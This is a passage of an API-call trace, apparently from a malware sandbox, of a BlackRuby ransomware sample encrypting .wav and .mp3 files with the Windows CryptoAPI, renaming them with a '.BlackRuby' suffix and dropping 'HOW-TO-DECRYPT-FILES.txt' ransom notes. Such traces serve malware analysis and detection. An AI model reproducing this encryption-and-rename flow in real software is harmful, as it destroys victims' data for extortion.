(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.265] GetLastError () returned 0x5 [0057.266] SetErrorMode (uMode=0x0) returned 0x1 [0057.266] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1", lpFilePart=0x0) returned 0x3b [0057.266] GetLastError () returned 0x5 [0057.266] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.266] GetLastError () returned 0x5 [0057.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0057.266] GetLastError () returned 0x5 [0057.266] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1", lpFilePart=0x0) returned 0x3b [0057.266] GetLastError () returned 0x5 [0057.266] SetErrorMode (uMode=0x1) returned 0x0 [0057.266] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0057.267] GetLastError () returned 0x5 [0057.267] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.267] GetLastError () returned 0x5 [0057.267] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.267] GetLastError () returned 0x5 [0057.267] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.267] GetLastError () returned 0x5 [0057.267] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.267] GetLastError () returned 0x5 [0057.267] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.267] GetLastError () returned 0x5 [0057.267] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0057.267] GetLastError () returned 0x12 [0057.267] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0057.268] SetErrorMode (uMode=0x0) returned 0x1 [0057.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1", lpFilePart=0x0) returned 0x3b [0057.268] GetLastError () returned 0x12 [0057.268] SetErrorMode (uMode=0x1) returned 0x0 [0057.268] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0057.268] GetLastError () returned 0x12 [0057.268] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.268] GetLastError () returned 0x12 [0057.268] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.268] GetLastError () returned 0x12 [0057.268] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.268] GetLastError () returned 0x12 [0057.268] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.268] GetLastError () returned 0x12 [0057.268] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.268] GetLastError () returned 0x12 [0057.269] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0057.269] GetLastError () returned 0x12 [0057.269] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0057.269] SetErrorMode (uMode=0x0) returned 0x1 [0057.269] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", lpFilePart=0x0) returned 0x45 [0057.269] GetLastError () returned 0x12 [0057.269] SetErrorMode (uMode=0x1) returned 0x0 [0057.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\i41up.wav"), fInfoLevelId=0x0, lpFileInformation=0x1b5e75c | out: lpFileInformation=0x1b5e75c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc2b9f0, ftCreationTime.dwHighDateTime=0x1d34f34, ftLastAccessTime.dwLowDateTime=0x8f352a60, ftLastAccessTime.dwHighDateTime=0x1d355a4, ftLastWriteTime.dwLowDateTime=0x8f352a60, ftLastWriteTime.dwHighDateTime=0x1d355a4, nFileSizeHigh=0x0, nFileSizeLow=0x12b7c)) returned 1 [0057.269] GetLastError () returned 0x12 [0057.269] SetErrorMode (uMode=0x0) returned 0x1 [0057.269] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", lpFilePart=0x0) returned 0x45 [0057.269] GetLastError () returned 0x12 [0057.269] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", lpFilePart=0x0) returned 0x45 [0057.269] GetLastError () returned 0x12 [0057.269] SetErrorMode (uMode=0x1) returned 0x0 [0057.269] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\i41up.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.270] GetLastError () returned 0x0 [0057.270] GetFileType (hFile=0x184) returned 0x1 [0057.270] SetErrorMode (uMode=0x0) returned 0x1 [0057.270] GetFileType (hFile=0x184) returned 0x1 [0057.270] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x12b7c [0057.270] GetLastError () returned 0x0 [0057.270] ReadFile (in: hFile=0x184, lpBuffer=0x1b603f4, nNumberOfBytesToRead=0x12b7c, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1b603f4*, lpNumberOfBytesRead=0x18ec40*=0x12b7c, lpOverlapped=0x0) returned 1 [0057.271] GetLastError () returned 0x0 [0057.271] CloseHandle (hObject=0x184) returned 1 [0057.271] GetLastError () returned 0x0 [0057.271] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", lpFilePart=0x0) returned 0x45 [0057.271] GetLastError () returned 0x0 [0057.271] SetErrorMode (uMode=0x1) returned 0x0 [0057.271] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\i41up.wav"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc2b9f0, ftCreationTime.dwHighDateTime=0x1d34f34, ftLastAccessTime.dwLowDateTime=0x8f352a60, ftLastAccessTime.dwHighDateTime=0x1d355a4, ftLastWriteTime.dwLowDateTime=0x8f352a60, ftLastWriteTime.dwHighDateTime=0x1d355a4, nFileSizeHigh=0x0, nFileSizeLow=0x12b7c)) returned 1 [0057.271] GetLastError () returned 0x0 [0057.271] SetErrorMode (uMode=0x0) returned 0x1 [0057.271] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c818) returned 1 [0057.271] GetLastError () returned 0x0 [0057.320] CryptImportKey (in: hProv=0x37c818, pbData=0x1bdfebc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360c20) returned 1 [0057.320] GetLastError () returned 0x0 [0057.320] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.320] GetLastError () returned 0x0 [0057.325] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.325] GetLastError () returned 0x0 [0057.325] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360f20) returned 1 [0057.325] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.325] GetLastError () returned 0x0 [0057.326] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c0cf08*=0x1, dwFlags=0x0) returned 1 [0057.326] GetLastError () returned 0x0 [0057.326] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c0ced4, dwFlags=0x0) returned 1 [0057.326] GetLastError () returned 0x0 [0057.326] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c0cf50*, pdwDataLen=0x18ec30*=0x12c70, dwBufLen=0x12c70 | out: pbData=0x1c0cf50*, pdwDataLen=0x18ec30*=0x12c70) returned 1 [0057.326] GetLastError () returned 0x0 [0057.326] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3285c*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c3285c*, pdwDataLen=0x18ec48*=0x10) returned 1 [0057.326] GetLastError () returned 0x0 [0057.326] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c3288c*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c3288c*, pdwDataLen=0x18ec50*=0x10) returned 1 [0057.326] GetLastError () returned 0x0 [0057.327] CryptDestroyKey (hKey=0x360c20) returned 1 [0057.327] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.328] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.328] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", lpFilePart=0x0) returned 0x45 [0057.328] GetLastError () returned 0x0 [0057.328] SetErrorMode (uMode=0x1) returned 0x0 [0057.328] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\i41up.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.329] GetLastError () returned 0xb7 [0057.329] GetFileType (hFile=0x184) returned 0x1 [0057.329] SetErrorMode (uMode=0x0) returned 0x1 [0057.329] GetFileType (hFile=0x184) returned 0x1 [0057.331] CloseHandle (hObject=0x184) returned 1 [0057.331] GetLastError () returned 0xb7 [0057.331] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav", lpFilePart=0x0) returned 0x45 [0057.331] GetLastError () returned 0xb7 [0057.331] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_84KK67Sb3QZkVsI1ju7iIW3liyd3Lx4YAfgY.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_84KK67Sb3QZkVsI1ju7iIW3liyd3Lx4YAfgY.BlackRuby", lpFilePart=0x0) returned 0x74 [0057.331] GetLastError () returned 0xb7 [0057.331] SetErrorMode (uMode=0x1) returned 0x0 [0057.331] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\i41up.wav"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc2b9f0, ftCreationTime.dwHighDateTime=0x1d34f34, ftLastAccessTime.dwLowDateTime=0x8f352a60, ftLastAccessTime.dwHighDateTime=0x1d355a4, ftLastWriteTime.dwLowDateTime=0x2a5cad20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12c80)) returned 1 [0057.331] GetLastError () returned 0xb7 [0057.331] SetErrorMode (uMode=0x0) returned 0x1 [0057.331] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\I41uP.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\i41up.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_84KK67Sb3QZkVsI1ju7iIW3liyd3Lx4YAfgY.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\encrypted_84kk67sb3qzkvsi1ju7iiw3liyd3lx4yafgy.blackruby")) returned 1 [0057.333] GetLastError () returned 0xb7 [0057.333] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x54 [0057.333] GetLastError () returned 0xb7 [0057.333] SetErrorMode (uMode=0x1) returned 0x0 [0057.333] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.333] GetLastError () returned 0x0 [0057.333] GetFileType (hFile=0x184) returned 0x1 [0057.333] SetErrorMode (uMode=0x0) returned 0x1 [0057.333] GetFileType (hFile=0x184) returned 0x1 [0057.334] CloseHandle (hObject=0x184) returned 1 [0057.334] GetLastError () returned 0x0 [0057.334] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x54 [0057.334] GetLastError () returned 0x0 [0057.334] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0057.335] GetLastError () returned 0x0 [0057.335] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", lpFilePart=0x0) returned 0x48 [0057.335] GetLastError () returned 0x0 [0057.335] SetErrorMode (uMode=0x1) returned 0x0 [0057.335] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\n5zwzfli.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c624b4 | out: lpFileInformation=0x1c624b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71748a80, ftCreationTime.dwHighDateTime=0x1d35a21, ftLastAccessTime.dwLowDateTime=0x477c4df0, ftLastAccessTime.dwHighDateTime=0x1d35079, ftLastWriteTime.dwLowDateTime=0x477c4df0, ftLastWriteTime.dwHighDateTime=0x1d35079, nFileSizeHigh=0x0, nFileSizeLow=0x9acf)) returned 1 [0057.335] GetLastError () returned 0x0 [0057.335] SetErrorMode (uMode=0x0) returned 0x1 [0057.335] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", lpFilePart=0x0) returned 0x48 [0057.335] GetLastError () returned 0x0 [0057.335] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", lpFilePart=0x0) returned 0x48 [0057.335] GetLastError () returned 0x0 [0057.335] SetErrorMode (uMode=0x1) returned 0x0 [0057.335] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\n5zwzfli.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.335] GetLastError () returned 0x0 [0057.335] GetFileType (hFile=0x184) returned 0x1 [0057.335] SetErrorMode (uMode=0x0) returned 0x1 [0057.335] GetFileType (hFile=0x184) returned 0x1 [0057.335] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x9acf [0057.335] GetLastError () returned 0x0 [0057.335] ReadFile (in: hFile=0x184, lpBuffer=0x1c64430, nNumberOfBytesToRead=0x9acf, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1c64430*, lpNumberOfBytesRead=0x18ec40*=0x9acf, lpOverlapped=0x0) returned 1 [0057.336] GetLastError () returned 0x0 [0057.336] CloseHandle (hObject=0x184) returned 1 [0057.336] GetLastError () returned 0x0 [0057.336] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", lpFilePart=0x0) returned 0x48 [0057.336] GetLastError () returned 0x0 [0057.336] SetErrorMode (uMode=0x1) returned 0x0 [0057.336] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\n5zwzfli.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71748a80, ftCreationTime.dwHighDateTime=0x1d35a21, ftLastAccessTime.dwLowDateTime=0x477c4df0, ftLastAccessTime.dwHighDateTime=0x1d35079, ftLastWriteTime.dwLowDateTime=0x477c4df0, ftLastWriteTime.dwHighDateTime=0x1d35079, nFileSizeHigh=0x0, nFileSizeLow=0x9acf)) returned 1 [0057.336] GetLastError () returned 0x0 [0057.336] SetErrorMode (uMode=0x0) returned 0x1 [0057.347] CryptImportKey (in: hProv=0x37c790, pbData=0x1cd1dac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ae0) returned 1 [0057.347] GetLastError () returned 0x0 [0057.347] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.347] GetLastError () returned 0x0 [0057.352] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.352] GetLastError () returned 0x0 [0057.352] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360fa0) returned 1 [0057.352] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.352] GetLastError () returned 0x0 [0057.353] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1cfedf8*=0x1, dwFlags=0x0) returned 1 [0057.353] GetLastError () returned 0x0 [0057.353] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1cfedc4, dwFlags=0x0) returned 1 [0057.353] GetLastError () returned 0x0 [0057.353] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cfee40*, pdwDataLen=0x18ec30*=0x9bc0, dwBufLen=0x9bc0 | out: pbData=0x1cfee40*, pdwDataLen=0x18ec30*=0x9bc0) returned 1 [0057.353] GetLastError () returned 0x0 [0057.353] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d125ec*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1d125ec*, pdwDataLen=0x18ec48*=0x10) returned 1 [0057.353] GetLastError () returned 0x0 [0057.353] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d1261c*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1d1261c*, pdwDataLen=0x18ec50*=0x10) returned 1 [0057.353] GetLastError () returned 0x0 [0057.353] CryptDestroyKey (hKey=0x360ae0) returned 1 [0057.353] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.353] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.353] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3", lpFilePart=0x0) returned 0x48 [0057.353] GetLastError () returned 0x0 [0057.353] SetErrorMode (uMode=0x1) returned 0x0 [0057.354] GetFileType (hFile=0x184) returned 0x1 [0057.354] GetFileType (hFile=0x184) returned 0x1 [0057.355] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\N5ZwzFli.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\n5zwzfli.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_1ZyXF4aFotTN6T1n62J6QhIOs3yaAlbv8t4A7pIDR3DYz.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\encrypted_1zyxf4afottn6t1n62j6qhios3yaalbv8t4a7pidr3dyz.blackruby")) returned 1 [0057.356] GetLastError () returned 0xb7 [0057.372] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.372] GetLastError () returned 0x5 [0057.373] SetErrorMode (uMode=0x0) returned 0x1 [0057.374] GetFullPathNameW (in: 